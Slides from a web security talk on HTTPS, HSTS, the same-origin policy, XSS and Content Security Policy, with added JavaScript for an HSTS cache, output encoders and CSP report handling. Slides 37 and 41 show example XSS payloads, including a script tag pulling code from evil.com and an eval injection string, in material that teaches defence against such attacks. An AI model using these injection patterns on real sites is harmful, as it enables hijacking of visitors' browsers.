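Added example, not from the slides: a small model of the browser-side HSTS cache that slides 23 to 27 describe, covering the error-free-channel rule, max-age expiry (including max-age=0), includeSubdomains matching and a preloaded host. The host names, timestamps and the preloaded set are constructed, and preloaded entries are assumed to cover subdomains.

```javascript
// Added example (not from the slides): a browser-side HSTS cache model.
// Hosts, timestamps and the preloaded set used with it are constructed.

// Parse "max-age=31536000; includeSubdomains" into a policy object.
// Directive names are case-insensitive (RFC 6797); unknown ones are ignored.
function parseHsts(headerValue) {
  let maxAge = null;
  let includeSubdomains = false;
  for (const part of headerValue.split(';')) {
    const [name, value] = part.trim().split('=').map((s) => s.trim());
    const key = name.toLowerCase();
    if (key === 'max-age' && /^\d+$/.test(value || '')) maxAge = Number(value);
    if (key === 'includesubdomains') includeSubdomains = true;
  }
  return maxAge === null ? null : { maxAge, includeSubdomains };
}

class HstsCache {
  // preloaded: hosts shipped with the browser (slide 27). They never expire,
  // which is what solves the bootstrapping problem for a first visit.
  // Assumption: preloaded entries also cover their subdomains.
  constructor(preloaded = []) {
    this.policies = new Map(); // host -> { expires (ms), includeSubdomains }
    for (const host of preloaded) {
      this.policies.set(host, { expires: Infinity, includeSubdomains: true });
    }
  }

  // Called for every response. The header is only honoured when it arrived
  // over an error-free HTTPS connection, so a man in the middle on plain
  // HTTP (or with a bad certificate) can neither set nor clear the policy.
  onResponse(host, { https, certOk, hsts }, now) {
    if (!https || !certOk || !hsts) return;
    const policy = parseHsts(hsts);
    if (!policy) return;
    if (policy.maxAge === 0) { this.policies.delete(host); return; } // max-age=0 disables
    this.policies.set(host, {
      expires: now + policy.maxAge * 1000,
      includeSubdomains: policy.includeSubdomains,
    });
  }

  // Must a navigation to http://host be rewritten to https:// before any
  // request leaves the browser? Walks up the labels so that includeSubdomains
  // on websec.be also covers www.websec.be.
  shouldUpgrade(host, now) {
    const labels = host.split('.');
    for (let i = 0; i < labels.length - 1; i++) {
      const policy = this.policies.get(labels.slice(i).join('.'));
      if (!policy || policy.expires <= now) continue;
      if (i === 0 || policy.includeSubdomains) return true;
    }
    return false;
  }
}
```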
  • 28. HTTPS Should Be Enabled by Default
    § Browser vendors are strongly pushing towards HTTPS
    § Firefox marks HTTP pages with password fields as insecure
    § Google uses HTTPS as a ranking signal in its search engine
    § Active mixed content is blocked in modern browsers
    § Chrome and Firefox will support Secure Contexts
    § A Secure Context is delivered over HTTPS, including its parents
    § Powerful features will only be exposed to a Secure Context
      • E.g. Geolocation, microphone and camera access, …
  • 29. Hardening your HTTPS Deployment
    § Fine-tune the supported protocols and ciphers
    § Disable the old and obsolete SSLv2 and SSLv3
    § Avoid the use of old and weak ciphers
    § Move all your traffic to HTTPS
    § Immediately redirect all HTTP traffic to HTTPS
    § Prevent SSL Stripping by enabling Strict Transport Security (HSTS)
    § If you want to go all out, enable Public Key Pinning (HPKP)
    § Prevents impersonation attacks with rogue but valid certificates
    https://www.ssllabs.com/ssltest/
  • 30. Insecure Third-Party Content Can Be Disastrous 30
  • 31. Browsers Do More than Rendering HTML
    § Modern browsers are full-fledged application platforms
    § Plenty of system features are exposed to Web applications
      • Battery status, Vibration, Geolocation, Microphone & Camera, …
    § ChromeOS and FirefoxOS run all applications inside a browser
    § The key enabler for all of this functionality is JavaScript
    § Since its introduction in 1995, JS has finally taken over the Web
    § Plugins like Flash and Silverlight are slowly fading away
    § So, how about security?
    § We have the same-origin policy, but it’s 20 years old …
  • 32. The Same-Origin Policy
    [Diagram: documents from http://example.com, http://private.example.com and http://forum.example.com]
    SAME-ORIGIN POLICY: Content retrieved from one origin can freely interact with other content from that origin, but interactions with content from other origins are restricted
    ORIGIN: The triple <scheme, host, port> derived from the document’s URL. For http://example.org/forum/, the origin is <http, example.org, 80>
  • 33. Origins, Frames and Scripts
    § The browser enforces origin-based separation
    § Frames have a context, a document URL and an associated context
    § Scripts are loaded into the context of the including page
    § Classical trade-off between isolation and flexibility
    [Diagram: an http://example.com page framing http://malvertisements.com, next to an http://example.com page running script code from http://malvertisements.com]
    <iframe src="http://malvertisements.com/pwnme.html">
    <script src="http://malvertisements.com/pwnme.js">
  • 34. The Same-Origin Policy in Practice
    § Most content integration is script-based
    § Included directly into the application’s context
    § Which makes sense for libraries, such as jQuery
    § But not for standalone third-party components
    § Every included script is a security risk
    § Because it has full access to your context
    § So you have to trust the supplier
    § And the security of their systems
  • 36. Responsibly Including Third-Party Content
    § Isolate the content in a context with a different origin
    § Let the Same-Origin Policy protect you
    § Enable interaction by exchanging messages between contexts
    § Further restrict isolated context using the HTML5 Sandbox
    § Allows you to disable certain features in a framed context
    § Allows you to place your own content in a unique origin
    § Verify the integrity of content loaded from a CDN
    § Enabled by the brand new Subresource Integrity specification
    § Prevents malware distribution by compromising a CDN
    https://blogs.dropbox.com/tech/2015/09/csp-third-party-integrations-and-privilege-separation/
  • 37. With XSS, the Attacker Includes the Code for You
    Add review: I can really recommend product X. It is awesome! <script>alert('Never gonna let you down!')</script>
    Thanks for the review!
    Show Reviews → Reviews page: <html><body>… …</body></html>
  • 40. Traditional XSS Defenses
    § The server compiles data and code into a single HTML page
    § XSS causes the browser to mistake data for code
    § The proper defense is context-sensitive output encoding
    § Encode for the context where the data will be used
    § HTML body: <h1>DATA</h1>
    § HTML attributes: <div id='DATA'>
    § Stylesheet context: body { background-color: DATA;}
    § Script context: alert("DATA");
    § URL context: <a href="http://…?arg=DATA">
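Added example, not from the slides: one encoder per context from slide 40, applied to the review payload from slide 37, to show that the right encoding depends on where DATA lands (entity encoding, for instance, does nothing inside a script block). The encoder names and the some-shop.com search URL are constructed for the demonstration.

```javascript
// Added example (not from the slides): context-sensitive output encoders for
// the five contexts on slide 40. Function names are our own.

function encodeForHtml(data) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(data).replace(/[&<>"']/g, (c) => map[c]);
}

// Attribute values: every non-alphanumeric character becomes &#xHH;, which
// stays safe even if a developer forgets to quote the attribute.
function encodeForHtmlAttribute(data) {
  return String(data).replace(/[^A-Za-z0-9]/gu,
    (c) => `&#x${c.codePointAt(0).toString(16)};`);
}

// JavaScript string literal: \xHH / \uHHHH / \u{H...} escapes. HTML entity
// encoding would NOT help here: entities are never decoded inside <script>.
function encodeForJsString(data) {
  return String(data).replace(/[^A-Za-z0-9]/gu, (c) => {
    const cp = c.codePointAt(0);
    const hex = cp.toString(16);
    if (cp < 0x100) return `\\x${hex.padStart(2, '0')}`;
    if (cp < 0x10000) return `\\u${hex.padStart(4, '0')}`;
    return `\\u{${hex}}`;
  });
}

// URL query parameter: percent-encoding. The <a href> attribute around it
// still needs attribute encoding, so the two encoders are layered.
function encodeForUrlParam(data) {
  return encodeURIComponent(String(data));
}

// CSS property value: escaping is fragile here, so allow-list a hex colour
// and fall back to a harmless keyword for anything else.
function encodeForCssColor(data) {
  return /^#[0-9a-fA-F]{3,6}$/.test(String(data)) ? data : 'inherit';
}

// Renders the same untrusted DATA into each of slide 40's contexts.
function renderInAllContexts(data) {
  return [
    `<h1>${encodeForHtml(data)}</h1>`,
    `<div id='${encodeForHtmlAttribute(data)}'>`,
    `body { background-color: ${encodeForCssColor(data)}; }`,
    `alert("${encodeForJsString(data)}");`,
    `<a href="http://some-shop.com/search?arg=${encodeForHtmlAttribute(encodeForUrlParam(data))}">`,
  ].join('\n');
}
```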
  • 41. Content Security Policy against XSS
    XSS WITH INLINE SCRIPTS: <h1>You searched for<script>alert('XSS');</script></h1>
    XSS WITH REMOTE SCRIPTS: <h1>You searched for<script src="https://evil.com/hackme.js"></script></h1>
    XSS WITH EVAL: eval('alert("Your query string was ' + unescape(document.location.search) + '");'); with a query string of //hello%22);alert(1+%22
  • 42. The Essence of CSP
    § CSP reduces the harm of content injection vulnerabilities
    § By telling the client where resources should be loaded from
    § By disabling “dangerous features” by default
    § CSP is intended as a second line of defense
    § CSP will become more important in the future
    § Supporting CSP in your application may be non-trivial
    § Use of inline script blocks is disallowed
    § Use of eval is disallowed
  • 43. Introducing CSP by Example
    EXAMPLE POLICY:
    Content-Security-Policy: default-src 'self'; script-src 'self' https://cdnjs.cloudflare.com; style-src 'self' https://cdnjs.cloudflare.com/…/bootstrap.min.css;
    § A policy consists of a set of directives
    § Each directive controls a different kind of resource
    § Policy is delivered as an HTTP header by the server
      • Alternatively, the meta tag can also be used
    § Compatible browsers will enforce the policy on the response
  • 44. CSP is the Security Policy of the Future
    § CSP has been well received, and evolved quickly
    § Addition of plugin types, sandbox, child contexts, form destinations
    § Re-enabling inline script with support for nonces and hashes
    § Deprecates X-FRAME-OPTIONS header
    § Supports blocking of mixed content / upgrading insecure requests
    § CSP level 1 is widely supported by browsers
    § Support for level 2 is less widespread, but improving rapidly
    § Chrome makes CSP mandatory for its components
    § Browser extensions and packaged apps
  • 45. CSP Violation Reports
    § CSP can report violations back to the resource server
    § Allows for fine-tuning of the CSP policy
    § Gives insights into actual attacks
    § Enabled by using the report-uri directive
    § Points to a handler on the server that can process reports
    EXAMPLE POLICY:
    Content-Security-Policy: default-src 'self'; report-uri http://some-shop.com/csp-report.cgi
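Added example, not from the slides: building the header value of slide 43 from a directive map (so keyword sources always get their single quotes) and processing the JSON violation reports a browser POSTs to the report-uri of slide 45, grouped the way you would when deciding whether a report means a forgotten CDN host or an injection attempt. The report bodies are constructed sample input; the field names are those of CSP level 1/2 reports.

```javascript
// Added example (not from the slides): CSP header builder plus a handler for
// report-uri violation reports. SAMPLE_REPORTS below is constructed input.

// Keyword sources must be single-quoted in the header; enforce that here so a
// curly-quoted or bare "self" cannot slip into production.
const CSP_KEYWORDS = new Set(['self', 'none', 'unsafe-inline', 'unsafe-eval']);

function buildCsp(directives) {
  return Object.entries(directives).map(([name, sources]) => {
    const quoted = sources.map((s) => (CSP_KEYWORDS.has(s) ? `'${s}'` : s));
    return `${name} ${quoted.join(' ')}`;
  }).join('; ');
}

// Parse one report. Browsers wrap the fields in a "csp-report" object; level 1
// reports put the whole directive ("script-src 'self'") in violated-directive,
// so only the directive name is kept.
function parseCspReport(body) {
  const r = JSON.parse(body)['csp-report'];
  if (!r || typeof r['violated-directive'] !== 'string') {
    throw new Error('not a CSP report');
  }
  return {
    document: r['document-uri'],
    directive: (r['effective-directive'] || r['violated-directive']).split(' ')[0],
    blocked: r['blocked-uri'] || '',
  };
}

// Count reports per (directive, blocked origin). The same blocked origin
// across many documents usually means the policy forgot a legitimate host;
// "inline" or an unknown origin on one page is what to investigate.
function summariseReports(bodies) {
  const counts = new Map();
  for (const body of bodies) {
    let rep;
    try { rep = parseCspReport(body); } catch { continue; } // drop junk POSTs
    let origin = rep.blocked;
    try { origin = new URL(rep.blocked).origin; } catch { /* keyword such as "inline" */ }
    const key = `${rep.directive} ${origin}`;
    counts.set(key, (counts.get(key) || 0) + 1);
  }
  return Object.fromEntries(counts);
}

// Constructed sample reports, shaped as a browser would POST them to report-uri.
const SAMPLE_REPORTS = [
  JSON.stringify({ 'csp-report': {
    'document-uri': 'https://some-shop.com/reviews',
    'violated-directive': 'script-src', 'effective-directive': 'script-src',
    'blocked-uri': 'https://evil.com/hackme.js', 'original-policy': "default-src 'self'",
  } }),
  JSON.stringify({ 'csp-report': {
    'document-uri': 'https://some-shop.com/reviews',
    'violated-directive': "script-src 'self'", 'blocked-uri': 'inline',
  } }),
  JSON.stringify({ 'csp-report': {
    'document-uri': 'https://some-shop.com/',
    'violated-directive': "script-src 'self'", 'blocked-uri': 'inline',
  } }),
  '{"not": "a report"}',
];
```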
  • 46. The Web has Become Client-Centric 46
  • 47. Progressive Web Security
    § Take a progressive stance towards Web security
    § The Web has become client-centric, and so has Web security
    § Fully protecting your applications requires the latest technologies
    § All of these security technologies require explicit action
    § Training is essential to keep up to date with the latest technologies
    § Share your experiences, help others advance as well
    § Set an example on how to do it right
  • 48. I hope you learned something tonight … Now it’s up to you
    Grab a copy of the slides and share with anyone you can find
    Read my blog or follow me on Twitter to stay informed about web security
    Level up with Web security training!
    All information on https://www.websec.be
  • 49. Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe Acknowledgements Icons by Visual Pharm (https://icons8.com) Images by Unsplash (https://unsplash.com/)
  • 50. Why Traditional Web Security Technologies no Longer Suffice to Keep You Safe Philippe De Ryck philippe.deryck@cs.kuleuven.be /in/philippederyck https://www.websec.be @PhilippeDeRyck